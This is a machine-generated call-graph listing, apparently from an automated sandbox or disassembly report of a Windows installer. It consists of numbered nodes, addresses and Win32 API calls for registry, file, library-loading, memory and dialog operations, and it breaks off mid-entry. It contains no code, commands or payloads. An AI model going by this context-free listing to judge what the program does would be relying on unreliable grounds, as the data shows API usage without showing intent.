4387->4389 4388->4388 4388->4389 4389->4332 4972 401eee 4973 402a3a 18 API calls 4972->4973 4974 401ef5 4973->4974 4975 4060a5 5 API calls 4974->4975 4976 401f04 4975->4976 4977 401f1c GlobalAlloc 4976->4977 4980 401f84 4976->4980 4978 401f30 4977->4978 4977->4980 4979 4060a5 5 API calls 4978->4979 4981 401f37 4979->4981 4982 4060a5 5 API calls 4981->4982 4983 401f41 4982->4983 4983->4980 4987 405c6a wsprintfA 4983->4987 4985 401f78 4988 405c6a wsprintfA 4985->4988 4987->4985 4988->4980 4989 4014f0 SetForegroundWindow 4990 4028cf 4989->4990 4991 100015b3 4992 100014bb GlobalFree 4991->4992 4994 100015cb 4992->4994 4993 10001611 GlobalFree 4994->4993 4995 100015e6 4994->4995 4996 100015fd VirtualFree 4994->4996 4995->4993 4996->4993 5002 4018f5 5003 40192c 5002->5003 5004 402a3a 18 API calls 5003->5004 5005 401931 5004->5005 5006 4055ae 69 API calls 5005->5006 5007 40193a 5006->5007 5008 4024f7 5009 402a3a 18 API calls 5008->5009 5010 4024fe 5009->5010 5013 40597f GetFileAttributesA CreateFileA 5010->5013 5012 40250a 5013->5012 5014 4018f8 5015 402a3a 18 API calls 5014->5015 5016 4018ff 5015->5016 5017 405502 MessageBoxIndirectA 5016->5017 5018 401908 5017->5018 5019 1000103d 5020 1000101b 5 API calls 5019->5020 5021 10001056 5020->5021 5022 4014fe 5023 401506 5022->5023 5025 401519 5022->5025 5024 402a1d 18 API calls 5023->5024 5024->5025 5026 402b7f 5027 402ba7 5026->5027 5028 402b8e SetTimer 5026->5028 5029 402bfc 5027->5029 5030 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5027->5030 5028->5027 5030->5029 5031 401000 5032 401037 BeginPaint GetClientRect 5031->5032 5035 40100c DefWindowProcA 5031->5035 5033 4010f3 5032->5033 5037 401073 CreateBrushIndirect FillRect DeleteObject 5033->5037 5038 4010fc 5033->5038 5036 401179 5035->5036 5037->5033 5039 401102 CreateFontIndirectA 5038->5039 5040 401167 EndPaint 5038->5040 5039->5040 5041 401112 6 API calls 5039->5041 5040->5036 5041->5040 5042 404680 5043 404690 5042->5043 5044 4046ac 5042->5044 5053 4054e6 GetDlgItemTextA 5043->5053 5046 4046b2 SHGetPathFromIDListA 5044->5046 5047 4046df 5044->5047 5049 4046c9 SendMessageA 5046->5049 5050 4046c2 5046->5050 5048 40469d SendMessageA 5048->5044 5049->5047 5052 40140b 2 API calls 5050->5052 5052->5049 5053->5048 3729 402482 3740 402b44 3729->3740 3731 40248c 3744 402a1d 3731->3744 3733 402495 3734 40249f 3733->3734 3737 4026a6 3733->3737 3735 4024b8 RegEnumValueA 3734->3735 3736 4024ac RegEnumKeyA 3734->3736 3735->3737 3738 4024d1 RegCloseKey 3735->3738 3736->3738 3738->3737 3747 402a3a 3740->3747 3742 402b5d 3743 402b6b RegOpenKeyExA 3742->3743 3743->3731 3745 405d2e 18 API calls 3744->3745 3746 402a31 3745->3746 3746->3733 3748 402a46 3747->3748 3753 405d2e 3748->3753 3750 402a73 3750->3742 3758 405d3b 3753->3758 3754 405f5e 3755 402a67 3754->3755 3787 405d0c lstrcpynA 3754->3787 3755->3750 3771 405f77 3755->3771 3757 405ddc GetVersion 3757->3758 3758->3754 3758->3757 3759 405f35 lstrlenA 3758->3759 3762 405d2e 10 API calls 3758->3762 3764 405e54 GetSystemDirectoryA 3758->3764 3765 405e67 GetWindowsDirectoryA 3758->3765 3766 405f77 5 API calls 3758->3766 3767 405e9b SHGetSpecialFolderLocation 3758->3767 3768 405d2e 10 API calls 3758->3768 3769 405ede lstrcatA 3758->3769 3780 405bf3 RegOpenKeyExA 3758->3780 3785 405c6a wsprintfA 3758->3785 3786 405d0c lstrcpynA 3758->3786 3759->3758 3762->3759 3764->3758 3765->3758 3766->3758 3767->3758 3770 405eb3 SHGetPathFromIDListA CoTaskMemFree 3767->3770 3768->3758 3769->3758 3770->3758 3778 405f83 3771->3778 3772 405feb 3773 405fef CharPrevA 3772->3773 3775 40600a 3772->3775 3773->3772 3774 405fe0 CharNextA 3774->3772 3774->3778 3775->3750 3777 405fce CharNextA 3777->3778 3778->3772 3778->3774 3778->3777 3779 405fdb CharNextA 3778->3779 3788 4057a9 3778->3788 3779->3774 3781 405c64 3780->3781 3782 405c26 RegQueryValueExA 3780->3782 3781->3758 3783 405c47 RegCloseKey 3782->3783 3783->3781 3785->3758 3786->3758 3787->3755 3789 4057af 3788->3789 3790 4057c2 3789->3790 3791 4057b5 CharNextA 3789->3791 3790->3778 3791->3789 5054 401b02 5055 402a3a 18 API calls 5054->5055 5056 401b09 5055->5056 5057 402a1d 18 API calls 5056->5057 5058 401b12 wsprintfA 5057->5058 5059 4028cf 5058->5059 5060 401a03 5061 402a3a 18 API calls 5060->5061 5062 401a0c ExpandEnvironmentStringsA 5061->5062 5063 401a20 5062->5063 5065 401a33 5062->5065 5064 401a25 lstrcmpA 5063->5064 5063->5065 5064->5065 5066 402283 5067 402291 5066->5067 5068 40228b 5066->5068 5070 402a3a 18 API calls 5067->5070 5071 4022a1 5067->5071 5069 402a3a 18 API calls 5068->5069 5069->5067 5070->5071 5072 402a3a 18 API calls 5071->5072 5074 4022af 5071->5074 5072->5074 5073 402a3a 18 API calls 5075 4022b8 WritePrivateProfileStringA 5073->5075 5074->5073 5076 100029c3 5077 100029db 5076->5077 5078 10001534 2 API calls 5077->5078 5079 100029f6 5078->5079 5080 404005 lstrcpynA lstrlenA 3962 402308 3963 402338 3962->3963 3964 40230d 3962->3964 3966 402a3a 18 API calls 3963->3966 3965 402b44 19 API calls 3964->3965 3967 402314 3965->3967 3968 40233f 3966->3968 3969 40231e 3967->3969 3974 402357 3967->3974 3975 402a7a RegOpenKeyExA 3968->3975 3970 402a3a 18 API calls 3969->3970 3972 402325 RegDeleteValueA RegCloseKey 3970->3972 3972->3974 3979 402aa5 3975->3979 3984 402355 3975->3984 3976 402acb RegEnumKeyA 3977 402add RegCloseKey 3976->3977 3976->3979 3985 4060a5 GetModuleHandleA 3977->3985 3978 402b02 RegCloseKey 3978->3984 3979->3976 3979->3977 3979->3978 3981 402a7a 5 API calls 3979->3981 3981->3979 3983 402b1d RegDeleteKeyA 3983->3984 3984->3974 3986 4060c1 3985->3986 3987 4060cb GetProcAddress 3985->3987 3991 406037 GetSystemDirectoryA 3986->3991 3989 402aed 3987->3989 3989->3983 3989->3984 3990 4060c7 3990->3987 3990->3989 3992 406059 wsprintfA LoadLibraryExA 3991->3992 3992->3990 5081 402688 5082 402a3a 18 API calls 5081->5082 5083 40268f FindFirstFileA 5082->5083 5084 4026b2 5083->5084 5087 4026a2 5083->5087 5085 4026b9 5084->5085 5089 405c6a wsprintfA 5084->5089 5090 405d0c lstrcpynA 5085->5090 5089->5085 5090->5087 5091 401c8a 5092 402a1d 18 API calls 5091->5092 5093 401c90 IsWindow 5092->5093 5094 4019f3 5093->5094 4390 402410 4391 402b44 19 API calls 4390->4391 4392 40241a 4391->4392 4393 402a3a 18 API calls 4392->4393 4394 402423 4393->4394 4395 40242d RegQueryValueExA 4394->4395 4397 4026a6 4394->4397 4396 40244d 4395->4396 4400 402453 RegCloseKey 4395->4400 4396->4400 4401 405c6a wsprintfA 4396->4401 4400->4397 4401->4400 4402 401f90 4403 401fa2 4402->4403 4412 402050 4402->4412 4404 402a3a 18 API calls 4403->4404 4406 401fa9 4404->4406 4405 401423 25 API calls 4413 4021c9 4405->4413 4407 402a3a 18 API calls 4406->4407 4408 401fb2 4407->4408 4409 401fc7 LoadLibraryExA 4408->4409 4410 401fba GetModuleHandleA 4408->4410 4411 401fd7 GetProcAddress 4409->4411 4409->4412 4410->4409 4410->4411 4414 402023 4411->4414 4415 401fe6 4411->4415 4412->4405 4416 404f25 25 API calls 4414->4416 4417 402005 4415->4417 4418 401fee 4415->4418 4419 401ff6 4416->4419 4423 100016bd 4417->4423 4420 401423 25 API calls 4418->4420 4419->4413 4421 402044 FreeLibrary 4419->4421 4420->4419 4421->4413 4424 100016ed 4423->4424 4465 10001a5d 4424->4465 4426 100016f4 4427 1000180a 4426->4427 4428 10001705 4426->4428 4429 1000170c 4426->4429 4427->4419 4514 100021b0 4428->4514 4497 100021fa 4429->4497 4434 10001770 4440 100017b2 4434->4440 4441 10001776 4434->4441 4435 10001752 4527 100023da 4435->4527 4436 10001722 4439 10001728 4436->4439 4444 10001733 4436->4444 4437 1000173b 4450 10001731 4437->4450 4524 10002aa3 4437->4524 4439->4450 4508 100027e8 4439->4508 4442 100023da 11 API calls 4440->4442 4446 10001559 3 API calls 4441->4446 4448 100017a4 4442->4448 4443 10001758 4538 10001559 4443->4538 4518 10002589 4444->4518 4452 1000178c 4446->4452 4456 100017f9 4448->4456 4549 100023a0 4448->4549 4450->4434 4450->4435 4455 100023da 11 API calls 4452->4455 4454 10001739 4454->4450 4455->4448 4456->4427 4460 10001803 GlobalFree 4456->4460 4460->4427 4462 100017e5 4462->4456 4553 100014e2 wsprintfA 4462->4553 4463 100017de FreeLibrary 4463->4462 4556 10001215 GlobalAlloc 4465->4556 4467 10001a81 4557 10001215 GlobalAlloc 4467->4557 4469 10001cbb GlobalFree GlobalFree GlobalFree 4470 10001cd8 4469->4470 4486 10001d22 4469->4486 4471 1000201a 4470->4471 4481 10001ced 4470->4481 4470->4486 4473 1000203c GetModuleHandleA 4471->4473 4471->4486 4472 10001b60 GlobalAlloc 4474 10001a8c 4472->4474 4476 10002062 4473->4476 4477 1000204d LoadLibraryA 4473->4477 4474->4469 4474->4472 4475 10001bc9 GlobalFree 4474->4475 4478 10001bab lstrcpyA 4474->4478 4479 10001bb5 lstrcpyA 4474->4479 4485 10001f7a 4474->4485 4474->4486 4491 10001e75 GlobalFree 4474->4491 4492 10001224 2 API calls 4474->4492 4496 10001c07 4474->4496 4563 10001215 GlobalAlloc 4474->4563 4475->4474 4564 100015a4 GetProcAddress 4476->4564 4477->4476 4477->4486 4478->4479 4479->4474 4481->4486 4560 10001224 4481->4560 4482 100020b3 4483 100020c0 lstrlenA 4482->4483 4482->4486 4565 100015a4 GetProcAddress 4483->4565 4485->4486 4490 10001fbe lstrcpyA 4485->4490 4486->4426 4487 10002074 4487->4482 4495 1000209d GetProcAddress 4487->4495 4490->4486 4491->4474 4492->4474 4493 100020d9 4493->4486 4495->4482 4496->4474 4558 10001534 GlobalSize GlobalAlloc 4496->4558 4506 10002212 4497->4506 4499 10002349 GlobalFree 4500 10001712 4499->4500 4499->4506 4500->4436 4500->4437 4500->4450 4501 100022b9 GlobalAlloc MultiByteToWideChar 4504 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4501->4504 4505 10002303 4501->4505 4502 1000230a lstrlenA 4502->4499 4502->4505 4503 10001224 GlobalAlloc lstrcpynA 4503->4506 4504->4499 4505->4499 4571 1000251d 4505->4571 4506->4499 4506->4501 4506->4502 4506->4503 4567 100012ad 4506->4567 4510 100027fa 4508->4510 4509 1000289f VirtualAlloc 4511 100028bd 4509->4511 4510->4509 4512 100029b9 4511->4512 4513 100029ae GetLastError 4511->4513 4512->4450 4513->4512 4515 100021c0 4514->4515 4517 1000170b 4514->4517 4516 100021d2 GlobalAlloc 4515->4516 4515->4517 4516->4515 4517->4429 4522 100025a5 4518->4522 4519 100025f6 GlobalAlloc 4523 10002618 4519->4523 4520 10002609 4521 1000260e GlobalSize 4520->4521 4520->4523 4521->4523 4522->4519 4522->4520 4523->4454 4525 10002aae 4524->4525 4526 10002aee GlobalFree 4525->4526 4574 10001215 GlobalAlloc 4527->4574 4529 100023e6 4530 1000243a lstrcpynA 4529->4530 4531 1000244b StringFromGUID2 WideCharToMultiByte 4529->4531 4532 1000246f WideCharToMultiByte 4529->4532 4533 100024b4 GlobalFree 4529->4533 4534 10002490 wsprintfA 4529->4534 4535 100024ee GlobalFree 4529->4535 4536 10001266 2 API calls 4529->4536 4575 100012d1 4529->4575 4530->4529 4531->4529 4532->4529 4533->4529 4534->4529 4535->4443 4536->4529 4579 10001215 GlobalAlloc 4538->4579 4540 1000155f 4542 10001586 4540->4542 4543 1000156c lstrcpyA 4540->4543 4544 100015a0 4542->4544 4545 1000158b wsprintfA 4542->4545 4543->4544 4546 10001266 4544->4546 4545->4544 4547 100012a8 GlobalFree 4546->4547 4548 1000126f GlobalAlloc lstrcpynA 4546->4548 4547->4448 4548->4547 4550 100017c5 4549->4550 4551 100023ae 4549->4551 4550->4462 4550->4463 4551->4550 4552 100023c7 GlobalFree 4551->4552 4552->4551 4554 10001266 2 API calls 4553->4554 4555 10001503 4554->4555 4555->4456 4556->4467 4557->4474 4559 10001552 4558->4559 4559->4496 4566 10001215 GlobalAlloc 4560->4566 4562 10001233 lstrcpynA 4562->4486 4563->4474 4564->4487 4565->4493 4566->4562 4568 100012b4 4567->4568 4569 10001224 2 API calls 4568->4569 4570 100012cf 4569->4570 4570->4506 4572 10002581 4571->4572 4573 1000252b VirtualAlloc 4571->4573 4572->4505 4573->4572 4574->4529 4576 100012f9 4575->4576 4577 100012da 4575->4577 4576->4529 4577->4576 4578 100012e0 lstrcpyA 4577->4578 4578->4576 4579->4540 5095 401490 5096 404f25 25 API calls 5095->5096 5097 401497 5096->5097 4642 401595 4643 402a3a 18 API calls 4642->4643 4644 40159c SetFileAttributesA 4643->4644 4645 4015ae 4644->4645 4651 402616 4652 40261d 4651->4652 4658 40287c 4651->4658 4653 402a1d 18 API calls 4652->4653 4654 402628 4653->4654 4655 40262f SetFilePointer 4654->4655 4656 40263f 4655->4656 4655->4658 4659 405c6a wsprintfA 4656->4659 4659->4658 5098 401717 5099 402a3a 18 API calls 5098->5099 5100 40171e SearchPathA 5099->5100 5101 401739 5100->5101 5102 10001058 5104 10001074 5102->5104 5103 100010dc 5104->5103 5105 100014bb GlobalFree 5104->5105 5106 10001091 5104->5106 5105->5106 5107 100014bb GlobalFree 5106->5107 5108 100010a1 5107->5108 5109 100010b1 5108->5109 5110 100010a8 GlobalSize 5108->5110 5111 100010b5 GlobalAlloc 5109->5111 5112 100010c6 5109->5112 5110->5109 5113 100014e2 3 API calls 5111->5113 5114 100010d1 GlobalFree 5112->5114 5113->5112 5114->5103 5115 404e99 5116 404ea9 5115->5116 5117 404ebd 5115->5117 5118 404eaf 5116->5118 5127 404f06 5116->5127 5119 404ec5 IsWindowVisible 5117->5119 5123 404edc 5117->5123 5121 403f3d SendMessageA 5118->5121 5122 404ed2 5119->5122 5119->5127 5120 404f0b CallWindowProcA 5124 404eb9 5120->5124 5121->5124 5128 4047f0 SendMessageA 5122->5128 5123->5120 5133 404870 5123->5133 5127->5120 5129 404813 GetMessagePos ScreenToClient SendMessageA 5128->5129 5130 40484f SendMessageA 5128->5130 5131 404847 5129->5131 5132 40484c 5129->5132 5130->5131 5131->5123 5132->5130 5142 405d0c lstrcpynA 5133->5142 5135 404883 5143 405c6a wsprintfA 5135->5143 5137 40488d 5138 40140b 2 API calls 5137->5138 5139 404896 5138->5139 5144 405d0c lstrcpynA 5139->5144 5141 40489d 5141->5127 5142->5135 5143->5137 5144->5141 5145 402519 5146 40252e 5145->5146 5147 40251e 5145->5147 5149 402a3a 18 API calls 5146->5149 5148 402a1d 18 API calls 5147->5148 5151 402527 5148->5151 5150 402535 lstrlenA 5149->5150 5150->5151 5152 402557 5151->5152 5153 405a26 WriteFile 5151->5153 5153->5152 5154 40149d 5155 4014ab PostQuitMessage 5154->5155 5156 40226e 5154->5156 5155->5156 4675 403a1e 4676 403b71 4675->4676 4677 403a36 4675->4677 4679 403b82 GetDlgItem GetDlgItem 4676->4679 4680 403bc2 4676->4680 4677->4676 4678 403a42 4677->4678 4682 403a60 4678->4682 4683 403a4d SetWindowPos 4678->4683 4684 403ef1 19 API calls 4679->4684 4681 403c1c 4680->4681 4692 401389 2 API calls 4680->4692 4686 403f3d SendMessageA 4681->4686 4693 403b6c 4681->4693 4687 403a65 ShowWindow 4682->4687 4688 403a7d 4682->4688 4683->4682 4685 403bac SetClassLongA 4684->4685 4689 40140b 2 API calls 4685->4689 4713 403c2e 4686->4713 4687->4688 4690 403a85 DestroyWindow 4688->4690 4691 403a9f 4688->4691 4689->4680 4694 403e7a 4690->4694 4695 403aa4 SetWindowLongA 4691->4695 4696 403ab5 4691->4696 4697 403bf4 4692->4697 4694->4693 4706 403eab ShowWindow 4694->4706 4695->4693 4699 403ac1 GetDlgItem 4696->4699 4700 403b5e 4696->4700 4697->4681 4701 403bf8 SendMessageA 4697->4701 4698 403e7c DestroyWindow EndDialog 4698->4694 4703 403af1 4699->4703 4704 403ad4 SendMessageA IsWindowEnabled 4699->4704 4705 403f58 8 API calls 4700->4705 4701->4693 4702 40140b 2 API calls 4702->4713 4708 403afe 4703->4708 4710 403b45 SendMessageA 4703->4710 4711 403b11 4703->4711 4719 403af6 4703->4719 4704->4693 4704->4703 4705->4693 4706->4693 4707 405d2e 18 API calls 4707->4713 4708->4710 4708->4719 4709 403eca SendMessageA 4712 403b2c 4709->4712 4710->4700 4714 403b19 4711->4714 4715 403b2e 4711->4715 4712->4700 4713->4693 4713->4698 4713->4702 4713->4707 4716 403ef1 19 API calls 4713->4716 4721 403ef1 19 API calls 4713->4721 4736 403dbc DestroyWindow 4713->4736 4718 40140b 2 API calls 4714->4718 4717 40140b 2 API calls 4715->4717 4716->4713 4720 403b35 4717->4720 4718->4719 4719->4709 4720->4700 4720->4719 4722 403ca9 GetDlgItem 4721->4722 4723 403cc6 ShowWindow KiUserCallbackDispatcher 4722->4723 4724 403cbe 4722->4724 4745 403f13 KiUserCallbackDispatcher 4723->4745 4724->4723 4726 403cf0 EnableWindow 4729 403d04 4726->4729 4727 403d09 GetSystemMenu EnableMenuItem SendMessageA 4728 403d39 SendMessageA 4727->4728 4727->4729 4728->4729 4729->4727 4746 403f26 SendMessageA 4729->4746 4747 405d0c lstrcpynA 4729->4747 4732 403d67 lstrlenA 4733 405d2e 18 API calls 4732->4733 4734 403d78 SetWindowTextA 4733->4734 4735 401389 2 API calls 4734->4735 4735->4713 4736->4694 4737 403dd6 CreateDialogParamA 4736->4737 4737->4694 4738 403e09 4737->4738 4739 403ef1 19 API calls 4738->4739 4740 403e14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4739->4740 4741 401389 2 API calls 4740->4741 4742 403e5a 4741->4742 4742->4693 4743 403e62 ShowWindow 4742->4743 4744 403f3d SendMessageA 4743->4744 4744->4694 4745->4726 4746->4729 4747->4732 5157 100010e0 5166 1000110e 5157->5166 5158 100011c4 GlobalFree 5159 100012ad 2 API calls 5159->5166 5160 100011c3 5160->5158 5161 10001266 2 API calls 5165 100011b1 GlobalFree 5161->5165 5162 10001155 GlobalAlloc 5162->5166 5163 100011ea GlobalFree 5163->5166 5164 100012d1 lstrcpyA 5164->5166 5165->5166 5166->5158 5166->5159 5166->5160 5166->5161 5166->5162 5166->5163 5166->5164 5166->5165 5167 4048a2 GetDlgItem GetDlgItem 5168 4048f4 7 API calls 5167->5168 5176 404b0c 5167->5176 5169 404997 DeleteObject 5168->5169 5170 40498a SendMessageA 5168->5170 5171 4049a0 5169->5171 5170->5169 5173 4049d7 5171->5173 5175 405d2e 18 API calls 5171->5175 5172 404bf0 5174 404c9c 5172->5174 5183 404c49 SendMessageA 5172->5183 5209 404aff 5172->5209 5177 403ef1 19 API calls 5173->5177 5179 404ca6 SendMessageA 5174->5179 5180 404cae 5174->5180 5181 4049b9 SendMessageA SendMessageA 5175->5181 5176->5172 5186 4047f0 5 API calls 5176->5186 5210 404b7d 5176->5210 5178 4049eb 5177->5178 5182 403ef1 19 API calls 5178->5182 5179->5180 5191 404cc0 ImageList_Destroy 5180->5191 5192 404cc7 5180->5192 5202 404cd7 5180->5202 5181->5171 5187 4049f9 5182->5187 5189 404c5e SendMessageA 5183->5189 5183->5209 5184 403f58 8 API calls 5190 404e92 5184->5190 5185 404be2 SendMessageA 5185->5172 5186->5210 5194 404acd GetWindowLongA SetWindowLongA 5187->5194 5201 404a48 SendMessageA 5187->5201 5204 404ac7 5187->5204 5206 404a84 SendMessageA 5187->5206 5207 404a95 SendMessageA 5187->5207 5188 404e46 5196 404e58 ShowWindow GetDlgItem ShowWindow 5188->5196 5188->5209 5195 404c71 5189->5195 5191->5192 5193 404cd0 GlobalFree 5192->5193 5192->5202 5193->5202 5197 404ae6 5194->5197 5203 404c82 SendMessageA 5195->5203 5196->5209 5198 404b04 5197->5198 5199 404aec ShowWindow 5197->5199 5219 403f26 SendMessageA 5198->5219 5218 403f26 SendMessageA 5199->5218 5201->5187 5202->5188 5208 404870 4 API calls 5202->5208 5214 404d12 5202->5214 5203->5174 5204->5194 5204->5197 5206->5187 5207->5187 5208->5214 5209->5184 5210->5172 5210->5185 5211 404e1c InvalidateRect 5211->5188 5212 404e32 5211->5212 5220 4047ab 5212->5220 5213 404d40 SendMessageA 5217 404d56 5213->5217 5214->5213 5214->5217 5216 404dca SendMessageA SendMessageA 5216->5217 5217->5211 5217->5216 5218->5209 5219->5176 5223 4046e6 5220->5223 5222 4047c0 5222->5188 5224 4046fc 5223->5224 5225 405d2e 18 API calls 5224->5225 5226 404760 5225->5226 5227 405d2e 18 API calls 5226->5227 5228 40476b 5227->5228 5229 405d2e 18 API calls 5228->5229 5230 404781 lstrlenA wsprintfA SetDlgItemTextA 5229->5230 5230->5222 5231 10002162 5232 100021c0 5231->5232 5233 100021f6 5231->5233 5232->5233 5234 100021d2 GlobalAlloc 5232->5234 5234->5232 5235 401ca7 5236 402a1d 18 API calls 5235->5236 5237 401cae 5236->5237 5238 402a1d 18 API calls 5237->5238 5239 401cb6 GetDlgItem 5238->5239 5240 402513 5239->5240 4009 40192a 4010 40192c 4009->4010 4011 402a3a 18 API calls 4010->4011 4012 401931 4011->4012 4015 4055ae 4012->4015 4055 40586c 4015->4055 4018 4055d6 DeleteFileA 4020 40193a 4018->4020 4019 4055ed 4021 40571b 4019->4021 4069 405d0c lstrcpynA 4019->4069 4021->4020 4087 406010 FindFirstFileA 4021->4087 4023 405613 4024 405626 4023->4024 4025 405619 lstrcatA 4023->4025 4070 4057c5 lstrlenA 4024->4070 4026 40562c 4025->4026 4030 40563a lstrcatA 4026->4030 4032 405645 lstrlenA FindFirstFileA 4026->4032 4030->4032 4031 405743 4090 40577e lstrlenA CharPrevA 4031->4090 4032->4021 4043 405669 4032->4043 4035 4057a9 CharNextA 4035->4043 4036 405566 5 API calls 4037 405755 4036->4037 4038 405759 4037->4038 4039 40576f 4037->4039 4038->4020 4045 404f25 25 API calls 4038->4045 4042 404f25 25 API calls 4039->4042 4040 4056fa FindNextFileA 4040->4043 4044 405712 FindClose 4040->4044 4042->4020 4043->4035 4043->4040 4052 4056bb 4043->4052 4074 405d0c lstrcpynA 4043->4074 4044->4021 4046 405766 4045->4046 4047 405bc7 38 API calls 4046->4047 4050 40576d 4047->4050 4049 4055ae 62 API calls 4049->4052 4050->4020 4051 404f25 25 API calls 4051->4040 4052->4040 4052->4049 4052->4051 4053 404f25 25 API calls 4052->4053 4075 405566 4052->4075 4083 405bc7 MoveFileExA 4052->4083 4053->4052 4093 405d0c lstrcpynA 4055->4093 4057 40587d 4094 405817 CharNextA CharNextA 4057->4094 4060 4055ce 4060->4018 4060->4019 4061 405f77 5 API calls 4067 405893 4061->4067 4062 4058be lstrlenA 4063 4058c9 4062->4063 4062->4067 4065 40577e 3 API calls 4063->4065 4064 406010 2 API calls 4064->4067 4066 4058ce GetFileAttributesA 4065->4066 4066->4060 4067->4060 4067->4062 4067->4064 4068 4057c5 2 API calls 4067->4068 4068->4062 4069->4023 4071 4057d2 4070->4071 4072 4057e3 4071->4072 4073 4057d7 CharPrevA 4071->4073 4072->4026 4073->4071 4073->4072 4074->4043 4100 40595a GetFileAttributesA 4075->4100 4078 405581 RemoveDirectoryA 4080 40558f 4078->4080 4079 405589 DeleteFileA 4079->4080 4081 405593 4080->4081 4082 40559f SetFileAttributesA 4080->4082 4081->4052 4082->4081 4084 405bdb 4083->4084 4086 405be8 4083->4086 4103 405a55 lstrcpyA 4084->4103 4086->4052 4088 40573f 4087->4088 4089 406026 FindClose 4087->4089 4088->4020 4088->4031 4089->4088 4091 405749 4090->4091 4092 405798 lstrcatA 4090->4092 4091->4036 4092->4091 4093->4057 4095 405842 4094->4095 4096 405832 4094->4096 4098 4057a9 CharNextA 4095->4098 4099 405862 4095->4099 4096->4095 4097 40583d CharNextA 4096->4097 4097->4099 4098->4095 4099->4060 4099->4061 4101 405572 4100->4101 4102 40596c SetFileAttributesA 4100->4102 4101->4078 4101->4079 4101->4081 4102->4101 4104 405aa3 GetShortPathNameA 4103->4104 4105 405a7d 4103->4105 4107 405bc2 4104->4107 4108 405ab8 4104->4108 4130 40597f GetFileAttributesA CreateFileA 4105->4130 4107->4086 4108->4107 4110 405ac0 wsprintfA 4108->4110 4109 405a87 CloseHandle GetShortPathNameA 4109->4107 4111 405a9b 4109->4111 4112 405d2e 18 API calls 4110->4112 4111->4104 4111->4107 4113 405ae8 4112->4113 4131 40597f GetFileAttributesA CreateFileA 4113->4131 4115 405af5 4115->4107 4116 405b04 GetFileSize GlobalAlloc 4115->4116 4117 405b26 4116->4117 4118 405bbb CloseHandle 4116->4118 4119 4059f7 ReadFile 4117->4119 4118->4107 4120 405b2e 4119->4120 4120->4118 4132 4058e4 lstrlenA 4120->4132 4123 405b45 lstrcpyA 4126 405b67 4123->4126 4124 405b59 4125 4058e4 4 API calls 4124->4125 4125->4126 4127 405b9e SetFilePointer 4126->4127 4128 405a26 WriteFile 4127->4128 4129 405bb4 GlobalFree 4128->4129 4129->4118 4130->4109 4131->4115 4133 405925 lstrlenA 4132->4133 4134 4058fe lstrcmpiA 4133->4134 4135 40592d 4133->4135 4134->4135 4136 40591c CharNextA 4134->4136 4135->4123 4135->4124 4136->4133 5241 4028aa SendMessageA 5242 4028c4 InvalidateRect 5241->5242 5243 4028cf 5241->5243 5242->5243 5244 40432f 5245 40435b 5244->5245 5246 40436c 5244->5246 5305 4054e6 GetDlgItemTextA 5245->5305 5248 404378 GetDlgItem 5246->5248 5249 4043d7 5246->5249 5252 40438c 5248->5252 5250 4044bb 5249->5250 5259 405d2e 18 API calls 5249->5259 5303 404665 5249->5303 5250->5303 5307 4054e6 GetDlgItemTextA 5250->5307 5251 404366 5253 405f77 5 API calls 5251->5253 5254 4043a0 SetWindowTextA 5252->5254 5257 405817 4 API calls 5252->5257 5253->5246 5258 403ef1 19 API calls 5254->5258 5256 403f58 8 API calls 5261 404679 5256->5261 5262 404396 5257->5262 5263 4043bc 5258->5263 5264 40444b SHBrowseForFolderA 5259->5264 5260 4044eb 5265 40586c 18 API calls 5260->5265 5262->5254 5269 40577e 3 API calls 5262->5269 5266 403ef1 19 API calls 5263->5266 5264->5250 5267 404463 CoTaskMemFree 5264->5267 5268 4044f1 5265->5268 5270 4043ca 5266->5270 5271 40577e 3 API calls 5267->5271 5308 405d0c lstrcpynA 5268->5308 5269->5254 5306 403f26 SendMessageA 5270->5306 5273 404470 5271->5273 5276 4044a7 SetDlgItemTextA 5273->5276 5280 405d2e 18 API calls 5273->5280 5275 4043d0 5278 4060a5 5 API calls 5275->5278 5276->5250 5277 404508 5279 4060a5 5 API calls 5277->5279 5278->5249 5286 40450f 5279->5286 5282 40448f lstrcmpiA 5280->5282 5281 40454b 5309 405d0c lstrcpynA 5281->5309 5282->5276 5283 4044a0 lstrcatA 5282->5283 5283->5276 5285 404552 5287 405817 4 API calls 5285->5287 5286->5281 5291 4057c5 2 API calls 5286->5291 5292 4045a3 5286->5292 5288 404558 GetDiskFreeSpaceA 5287->5288 5290 40457c MulDiv 5288->5290 5288->5292 5290->5292 5291->5286 5293 404614 5292->5293 5295 4047ab 21 API calls 5292->5295 5294 404637 5293->5294 5296 40140b 2 API calls 5293->5296 5310 403f13 KiUserCallbackDispatcher 5294->5310 5297 404601 5295->5297 5296->5294 5299 404616 SetDlgItemTextA 5297->5299 5300 404606 5297->5300 5299->5293 5302 4046e6 21 API calls 5300->5302 5301 404653 5301->5303 5311 4042c4 5301->5311 5302->5293 5303->5256 5305->5251 5306->5275 5307->5260 5308->5277 5309->5285 5310->5301 5312 4042d2 5311->5312 5313 4042d7 SendMessageA 5311->5313 5312->5313 5313->5303 4622 4015b3 4623 402a3a 18 API calls 4622->4623 4624 4015ba 4623->4624 4625 405817 4 API calls 4624->4625 4637 4015c2 4625->4637 4626 40161c 4628 401621 4626->4628 4629 40164a 4626->4629 4627 4057a9 CharNextA 4627->4637 4630 401423 25 API calls 4628->4630 4631 401423 25 API calls 4629->4631 4632 401628 4630->4632 4638 401642 4631->4638 4641 405d0c lstrcpynA 4632->4641 4634 405468 2 API calls 4634->4637 4635 405485 5 API calls 4635->4637 4636 401633 SetCurrentDirectoryA 4636->4638 4637->4626 4637->4627 4637->4634 4637->4635 4639 401604 GetFileAttributesA 4637->4639 4640 4053eb 4 API calls 4637->4640 4639->4637 4640->4637 4641->4636 5314 4016b3 5315 402a3a 18 API calls 5314->5315 5316 4016b9 GetFullPathNameA 5315->5316 5317 4016d0 5316->5317 5318 4016f1 5316->5318 5317->5318 5321 406010 2 API calls 5317->5321 5319 401705 GetShortPathNameA 5318->5319 5320 4028cf 5318->5320 5319->5320 5322 4016e1 5321->5322 5322->5318 5324 405d0c lstrcpynA 5322->5324 5324->5318 5325 4014b7 5326 4014bd 5325->5326 5327 401389 2 API calls 5326->5327 5328 4014c5 5327->5328 5329 401d38 GetDC GetDeviceCaps 5330 402a1d 18 API calls 5329->5330 5331 401d56 MulDiv ReleaseDC 5330->5331 5332 402a1d 18 API calls 5331->5332 5333 401d75 5332->5333 5334 405d2e 18 API calls 5333->5334 5335 401dae CreateFontIndirectA 5334->5335 5336 